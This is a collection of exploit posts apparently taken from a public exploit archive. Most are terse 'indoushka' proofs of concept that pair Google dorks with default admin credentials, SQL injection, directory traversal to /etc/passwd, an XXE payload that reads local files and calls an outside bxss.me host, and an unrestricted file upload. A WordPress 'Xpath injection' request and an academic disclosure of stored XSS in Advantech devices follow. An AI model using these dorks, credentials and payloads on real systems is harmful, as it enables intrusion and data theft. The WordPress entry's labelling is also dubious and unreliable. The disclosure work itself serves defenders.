<pre><code>====================================================================================================================================<br />| # Title : Ekushey Project Manager CRM V3.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://creativeitem.com/ | <br />| # Dork : "Login | Ekushey Project Manager CRM" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] leave a default administrative account in place post installation.<br /><br />[+] User = admin@example.com & pass : 1234<br /><br />[+] http://127.0.0.1/Ekushey/index.php?admin/dashboard<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : E-Journal homoeo CMS v2.0.3 Sql inhection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://prosoftsolution.in// | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : job_detail.php?job_id=<br /><br />[+] https://127.0.0.1/homoeoaddain/job_detail.php?job_id=214%27 <====| inject here<br /><br />[+] Pan3l : /adminsys/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : EI Tube YouTube API V3 site builder Sql Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | <br />| # Vendor : https://pomento.in/ei-tube-youtube-api-v3-site-builder/?v=fa3c7f2b5dae | <br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /watch?page=%5c<br /><br />[+] https://127.0.0.1/ei-tubecom/watch?page=%5c<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : E-Fun CMS V5.0 XML external entity injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://www.e-fun.com.tw/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Vulnerability description :<br /><br />XML supports a facility known as "external entities", <br />which instruct an XML processor to retrieve and perform <br />an inline include of XML located at a particular URI. <br />An external XML entity can be used to append or modify <br />the document type declaration (DTD) associated with an <br />XML document. An external XML entity can also be used <br />to include XML within the content of an XML document. <br /><br />Now assume that the XML processor parses data originating <br />from a source under attacker control. Most of the time <br />the processor will not be validating, but it MAY include <br />the replacement text thus initiating an unexpected file <br />open operation, or HTTP transfer, or whatever system ids <br />the XML processor knows how to access. <br /><br />below is a sample XML document that will use this functionality <br />to include the contents of a local file (/etc/passwd)<br /><br />target : http://127.0.0.1/landtopcomtw/webadmin/<br /><br /><?xml version="1.0" encoding="utf-8"?><br /><!DOCTYPE indoushka [<br /> <!ENTITY indoushka SYSTEM "file:///etc/passwd"><br />]><br /><xxx>&indoushka;</xxx><br /><br />POST /webadmin/_chkpasswd.php HTTP/1.1<br />Content-type: text/xml<br />Host: landtop.com.tw<br />Content-Length: 175<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br />Accept: */*<br /><br /><?xml version="1.0" encoding="utf-8"?><br /><!DOCTYPE dt5fqyt [<br /> <!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/"><br />]><br /><_chkpasswd.php>&dt5fqytent;</_chkpasswd.php><br /><br /><br />[+] Affected items :<br /><br />/webadmin/ <br />/webadmin/_chkpasswd.php <br />/webadmin/index.php <br /><br />[+] The impact of this vulnerability :<br /><br />Attacks can include disclosing local files, <br />which may contain sensitive data such as passwords <br />or private user data, using file: schemes or relative <br />paths in the system identifier. Since the attack occurs <br />relative to the application processing the XML document, <br />an attacker may use this trusted application to pivot <br />to other internal systems, possibly disclosing <br />other internal content via http(s) requests.<br /><br />[+] How to fix this vulnerability :<br /><br />If possible it's recommended to disable parsing of XML external entities.<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: WordPress Core 5.6.2 - Xpath Injection<br /># Date: 13/08/2023<br /># Exploit Author: Behrouz Mansoori<br /># Vendor Homepage: https://wordpress.org<br /># Software Link: https://wordpress.org/download/releases<br /># Version: 5.6.2<br /># Tested on: Mac<br /><br /># [ VULNERABILITY DETAILS ] : <br /><br />#This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core,<br />#The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries.<br />#An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.<br /><br /># [ Sample Request ] :<br /><br />POST /wp-login.php HTTP/2<br />Host: localhost<br />Cookie: wordpress_test_cookie=WP%20Cookie%20check<br />Content-Length: 125<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: <br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: ""<br />Upgrade-Insecure-Requests: 1<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br /><br />log=test' and extractvalue (rand(), concat (0x7e, version () ))--+&pwd=test&<br />wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=https%3A%2F%2Ftarget_site%2Fwp-admin%2F&testcookie=1<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Education Time Indonesian School CRM v 1.7 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://p30vel.ir | <br />| # Dork : "media.php?module=detailberita&id=" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : downlot.php?file=../../../../../../../../../../etc/passwd<br /><br />[+] http://target_site/unit/spi/downlot.php?file=../../../../../../../../../../etc/passwd<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : doorGets CMS v7.0 Unrestricted File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://doorgets.io/t/en/ | <br />| # Dork : "Powered with doorGets ™" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Register new user . http://127.0.0.1/bestwayschoolcom/dg-user/en/?controller=authentification&action=register<br /><br />[+] Confirmation link in the email.<br /><br />[+] After login go to manage your profile http://127.0.0.1/eXplored/dg-user/en/?controller=account <br /><br />[+] From paramaters Choose an HTML editor ( editor tinymce ) & press Save .<br /><br />[+] Creat new Blog http://127.0.0.1/eXplored/dg-user/en/?controller=moduleblog&uri=blog&action=add<br /><br />[+] insert your Ev!l .php2 .html .svg ...<br /><br />[+] http://127.0.0.1/fileman/Uploads/ (Uploaded malicious files can be run remotely )<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Datoo - Complete Dating Script v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://www.codelist.cc/scripts/232821-datoo-v10-complete-dating-script.html | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] leave a default administrative account in place post installation<br /><br />[+] use payload : user : admin@admin.com pass : admin<br /><br />[+] panel : https://target_site/admin/dashboard.php <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CSC-CMS v1.0.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) |<br />| # Vendor : http://creativesales.hu/ | <br />| # Dork : A honlapot a Creative Sales Consulting készítette. |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] appears to leave default credentials installed after installation.<br /><br />[+] USE PAyL0@D : admin & pass : adminpass<br /><br />[+] Panel : https://127.0.0.1/viprexhu/admin/index.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>St. Pölten UAS<br />-------------------------------------------------------------------------------<br /> title| Multiple XSS in Advantech<br /> product| Advantech EKI-1524-CE series, EKI-1522 series,<br /> | EKI-1521 series<br /> vulnerable version| <=1.21 (CVE-2023-4202), <=1.24 (CVE-2023-4203)<br /> fixed version| 1.26<br /> CVE number| CVE-2023-4202, CVE-2023-4203<br /> impact| Medium<br /> homepage| https://advantech.com<br /> found| 2023-05-04<br /> by| R. Haas, A. Resanovic, T. Etzenberger, M. Bineder<br /> | This vulnerability was discovery during research at<br /> | St. Pölten UAS, supported and coordinated by CyberDanube.<br /> |<br /> | https://fhstp.ac.at | https://cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />“Advantech’s corporate vision is to enable an intelligent planet. The company<br />is a global leader in the fields of IoT intelligent systems and embedded<br />platforms. To embrace the trends of IoT, big data, and artificial intelligence,<br />Advantech promotes IoT hardware and software solutions with the Edge<br />Intelligence WISE-PaaS core to assist business partners and clients in<br />connecting their industrial chains. Advantech is also working with business<br />partners to co-create business ecosystems that accelerate the goal of<br />industrial intelligence.”<br /><br />Source: https://www.advantech.com/en/about<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />EKI-1524-CE series / 1.21 (CVE-2023-4202)<br />EKI-1522-CE series / 1.21 (CVE-2023-4202)<br />EKI-1521-CE series / 1.21 (CVE-2023-4202)<br /><br />EKI-1524-CE series / 1.24 (CVE-2023-4203)<br />EKI-1522-CE series / 1.24 (CVE-2023-4203)<br />EKI-1521-CE series / 1.24 (CVE-2023-4203)<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203)<br />Two stored cross-site scripting vulnerabilities has been identified in the<br />firmware of the device. The first XSS was identified in the "Device Name" field<br />and the second XSS was found in the "Ping" tool. This can be exploited in the<br />context of a victim's session.<br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (XSS)<br />Both cross-site scripting vulnerabilities are permanently affecting the device.<br /><br />1.1) Stored XSS in Device Name CVE-2023-4202<br />The first vulnerability can be triggerd by setting the device name<br />("System->Device Name") to the following value:<br />"><script>alert("document.cookie")</script><br /><br />This code prints out the cached cookies to the screen.<br /><br />1.2) Stored XSS in Ping Function CVE-2023-4203<br />The second XSS vulnerability can be found in "Tools->Ping". The following GET<br />request prints the current cached cookies of a user's session to the screen.<br /><br />http://$IP/cgi-bin/ping.sh?random_num=2013&ip=172.16.0.141%3b%20<script>alert(1)</script>&size=56&count=1&interface=eth0&_=1682793104513<br /><br />An alternative to the used payload is using "onmouseover" event tags. In this<br />case it prints out the number "1337":<br />" onmousemove="alert(1337)"<br /><br />The vulnerability was manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Upgrade to the newest available firmware.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None.<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />Advantech customers are advised to upgrade the firware to the latest<br />available version.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2023-05-16: Contacting vendor via security contact.<br />2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21.<br /> The contact is trying to reproduce issue 1.2; Gave advice to<br /> reproduce issue.<br />2023-05-25: Contact stated that new firmware should resolve the issue.<br />2023-06-03: Sent new payload to the vendor.<br />2023-06-05: Vendor asked for clarification; Sent further explaination to the<br /> contact; Vendor contact said he knows a solution.<br />2023-06-22: Asked for an update; Contact stated that the beta firmware should<br /> resolve the issues.<br />2023-06-27: Asked for the release date.<br />2023-07-04: Contact stated, that they are currently doing QA tests.<br />2023-07-06: Asked if issue 1.1 is really resolved to be released; Vendor stated<br /> that it can be published.<br />2023-07-17: Assigned CVE numbers for the issues. Asked for an update.<br />2023-07-18: Vendor contact stated that the firmware will be released end of<br /> July.<br />2023-08-07: Asked contact for the new firmware version.<br />2023-08-08: Received version 1.26 as the official released firmware with fixes.<br /> Coordinated release of security advisory.<br /><br /><br /><br />Web: https://www.fhstp.ac.at/<br />Twitter: https://twitter.com/fh_stpoelten<br />Mail: mis at fhstp dot ac dot at<br /><br />EOF T. Weber / @2023<br /><br /><br /></code></pre>